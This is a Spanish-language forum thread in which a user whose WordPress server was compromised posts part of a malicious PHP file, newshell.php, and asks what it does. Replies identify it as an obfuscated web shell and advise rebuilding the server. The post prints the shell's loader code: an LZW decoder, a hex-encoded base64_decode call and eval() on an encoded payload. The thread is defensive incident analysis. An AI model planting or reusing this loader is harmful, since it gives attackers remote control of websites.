# Archivo malicioso en servidor linux Ubuntu 18

Tags: php, ubuntu

Me insertaron un archivo malicioso por medio de wordpress, ya quite los permisos a ese wordpress, también vi que no estuviera nada mas infectado sin embargo me gustaría saber que hace este archivo.

**Nombre del archivo:** newshell.php

```
<?php
$PASS="c279fa156e660bbb90ba27e1c69605d6";

function T_($Bc) {
    $x2 = 256;
    $W2 = 8;
    $cY = array();
    $I3 = 0;
    $C4 = 0;
    for ($bs = 0; $bs < strlen($Bc); $bs++) {
        $I3 = ($I3 << 8) + ord($Bc[$bs]);
        $C4 += 8;
        if ($C4 >= $W2) {
            $C4 -= $W2;
            $cY[] = $I3 >> $C4;
            $I3 &= (1 << $C4) - 1;
            $x2++;
            if ($x2 >> $W2) {
                $W2++;
            }
        }
    }
    $K5 = range("\x0", "\377");
    $UH = '';
    foreach ($cY as $bs => $xd) {
        if (!isset($K5[$xd])) {
            $iU = $Co . $Co[0];
        } else {
            $iU = $K5[$xd];
        }
        $UH .= $iU;
        if ($bs) {
            $K5[] = $Co . $iU[0];
        }
        $Co = $iU;
    }
    return $UH;
}
$_DMIE8x="\x62\x61\x73\x65\x36\64\137\144\x65\x63\x6f\x64\x65";
eval(T_($_DMIE8x("aTMKBCaTmczKdBQJCgQSmUxSKT2IIVDCmIB6IBEYjEZhsMhgZBoYjCNBsZhqOByNzINjGYhyZhmM
xkYjGNhgOBwIh2ID7EnElkxFhAdDkdTLOxJP05QhOVSoRhaOBPSJ+mqYRjSbDKcyaYTdU58lkzQj
aZBrCS+UyKUitay2JyQVCoUC+VbUUi+QSORScVBOXRTO4AIIFBINCBIXyGTyeSySRS3ZbPibvbSl
b7jcy+SCeU79gBcIjWZTyIsAKRBETgcjedNaeTgZRRkrRlbdcLldM5nr+KdDo9KLLCmcDPBBABQZ
```

El código sigue, pero es igual a esto, como si fuera una contraseña super encriptada.

Comment: ¿Cuál es la duda en si?

Comment: La solución sensata es QUEMAR TODO, instalar de cero usando un backup confiable de la instalación y actualizar todo a versiones más recientes que cubran las vulnerbailidades que permitieron esta intrusión en primer lugar. No sabes qué más cosas quedarony permitan que ingresen de nuevo, después.

Answer (score 2, accepted):

Una búsqueda en internet de parte del contenido del archivo arroja esta dirección:

https://medium.com/@ostapkorkuna/fighting-a-russian-hacker-a-story-of-one-infected-wordpress-website-5ca0318f7a7a

Lo que va ahí supongo que es un contenido comprimido en base 64. Al descomprimirlo y
pasarlo por eval arroja el código entendible, que permite intentar todo lo que se
pueda a través de php: listar directorios, intervenir en ficheros de configuración, etc.

Existe la posibilidad de que haya dejado una puerta trasera, conviene hacer un diagnóstico del servidor.

Comment: Gracias era eso especificamente lo que queria saber, si es un virus en efecto.